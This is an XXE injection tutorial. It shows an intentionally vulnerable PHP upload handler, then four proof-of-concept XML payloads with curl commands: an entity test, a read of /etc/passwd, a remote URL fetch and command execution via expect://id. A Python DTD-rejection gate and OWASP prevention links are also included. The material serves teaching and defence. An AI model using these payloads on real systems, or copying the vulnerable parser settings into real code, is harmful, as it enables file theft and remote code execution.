XXE

What is it?

XML External Entity (XXE) injection targets systems that parse XML input, whether it arrives through a file upload or another channel. A crafted XML document abuses the SYSTEM entity mechanism and can be used to attack the web application that parses it. Attacks include denial of service, local file disclosure, remote code execution, and more.

Extensible Markup Language (XML) was designed for desktop publishing and is now widely used for data exchange. It is a markup language similar to HTML; both derive from SGML, which was based on IBM's GML from the 1960s. XML is typically used instead of HTML when data must be sent from one application to another (data interchange).

Exploitation

XXE flaws are a form of injection attack. XML parsers support "external entities" by default. Abusing an XXE flaw lets a malicious document turn the XML parser into a proxy that can serve local and remote content (external entity vulnerabilities are similar to LFI/RFI). In some configurations this can lead to RCE.

Types of XXE attacks

Exploiting XXE to retrieve files: an external entity is defined containing the contents of a file, and that content is returned in the application's response.

Exploiting XXE to perform SSRF attacks: an external entity is defined based on a URL to a back-end system.

Exploiting blind XXE to exfiltrate data out-of-band: sensitive data is transmitted from the application server to a system that the attacker controls.

Exploiting blind XXE to retrieve data via error messages: the attacker can trigger a parsing error message containing sensitive data.

SSRF via XXE

SSRF is related to CSRF. CSRF: a forged request originating from a client. SSRF: a forged request originating from a server.

Example PoC

This PoC assumes access to the server-side code. Below is the vulnerable server-side PHP script behind /book.php; viewing the page's HTML source would not reveal it.

<?php
// Vulnerable handler: LIBXML_NOENT makes the parser substitute entity references and
// LIBXML_DTDLOAD makes it load the DTD, so a SYSTEM entity in the request body is resolved.
$xmlfile = file_get_contents('php://input');
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$xml = simplexml_import_dom($dom);
$author = $xml->author;
$title = $xml->title;
$date = $xml->publish_date;

// The parsed values are echoed back, so whatever an entity expanded to appears in the response.
echo "Thank you for your file submission!<br>";
echo "Your entry: <br>";
echo "Author: " . $author . "<br>";
echo "Title: " . $title . "<br>";
echo "Date: " . $date . "<br>";
?>

The page above is a workable target because it reads the author, title, and publish_date elements from the submitted XML and echoes them back, so the expansion of an entity placed in one of those elements ends up in the response.

PoC 1- Testing payload (xxe.xml)

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe "TEST" >]>
<entry>
    <author>&xxe;</author>
    <title>Title</title>
    <publish_date>1990</publish_date>
</entry>

# Upload the file via the site's file upload, or use curl to send the payload
curl -d@/home/test/xxe.xml http://test.com/book.php
# On browser route to http:

PoC 2 (LFI) - Display Local File (xxe2.xml)

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<entry>
    <author>&xxe;</author>
    <title>Title</title>
    <publish_date>1990</publish_date>
</entry>

# Upload the file via the site's file upload, or use curl to send the payload
curl -d@/home/test/xxe2.xml http://test.com/book.php

PoC 3 (RFI) - Access URL (xxe3.xml)

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://google.com/robots.txt" >]>
<entry>
    <author>&xxe;</author>
    <title>Title</title>
    <publish_date>1990</publish_date>
</entry>

# Upload the file via the site's file upload, or use curl to send the payload
curl -d@/home/test/xxe3.xml http://test.com/book.php

PoC 4 (RCE) - Remote Code Execution via php (xxe4.xml)

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<entry>
    <author>&xxe;</author>
    <title>Title</title>
    <publish_date>1990</publish_date>
</entry>

# Upload the file via the site's file upload, or use curl to send the payload
curl -d@/home/test/xxe4.xml http://test.com/book.php
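All four PoCs rely on book.php accepting a DTD at all, which is why the OWASP cheat sheet linked below recommends disabling DTD processing for untrusted input. As an added example (not code from this page), here is such a gate built on Python's stdlib expat: it records any DOCTYPE and entity declarations without resolving them and refuses documents that carry a DTD. The sample documents are constructed to match the page's entry format; nothing is captured traffic.

```python
import xml.parsers.expat as expat

def inspect_xml(data: bytes) -> dict:
    """Report DTD usage without resolving anything.

    expat fetches nothing on its own: only an ExternalEntityRefHandler would,
    and none is set, so external entities are just recorded as (name, system id).
    """
    report = {"doctype": None, "entities": []}
    parser = expat.ParserCreate()
    # Do not read an external DTD subset or parameter entity either.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, system_id, public_id, has_internal_subset):
        report["doctype"] = name

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        # system_id is None for an internal entity such as <!ENTITY xxe "TEST">.
        report["entities"].append((name, system_id))

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.Parse(data, True)
    return report

def external_entities(report: dict) -> list:
    """Entities declared with a SYSTEM or PUBLIC identifier."""
    return [(n, s) for n, s in report["entities"] if s is not None]

def accept_submission(data: bytes) -> bool:
    """OWASP guidance: untrusted XML with any DTD is refused, as is unparseable input."""
    try:
        report = inspect_xml(data)
    except expat.ExpatError:
        return False
    return report["doctype"] is None

# Constructed samples in the shape book.php expects (not captured traffic).
BENIGN = (b'<?xml version="1.0"?>\n<entry><author>A. Writer</author>'
          b'<title>Title</title><publish_date>1990</publish_date></entry>')
# Same structure as the page's xxe2.xml.
FILE_PROBE = (b'<?xml version="1.0"?>\n<!DOCTYPE foo [\n<!ELEMENT foo ANY >\n'
              b'<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>\n'
              b'<entry><author>&xxe;</author><title>Title</title>'
              b'<publish_date>1990</publish_date></entry>')

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("file probe", FILE_PROBE)):
        rep = inspect_xml(doc)
        print(label, accept_submission(doc), rep["doctype"], external_entities(rep))
```

The same report also feeds detection: an entity with a non-empty system id in a request body is the signature a WAF or log rule would alert on, while the benign document produces no DOCTYPE at all.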

Sample payload

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>

Payloads

Good Resource for payloads: https://github.com/payloadbox/xxe-injection-payload-list

Cheat sheet

OWASP XML Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html

Other Resources

OWASP's XML External Entity (XXE) Processing: https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing

Blind XXE: https://portswigger.net/web-security/xxe/blind

Exploiting XXE with local DTD files: https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/

From blind XXE to root-level file read access: https://honoki.net/2018/12/12/from-blind-xxe-to-root-level-file-read-access/
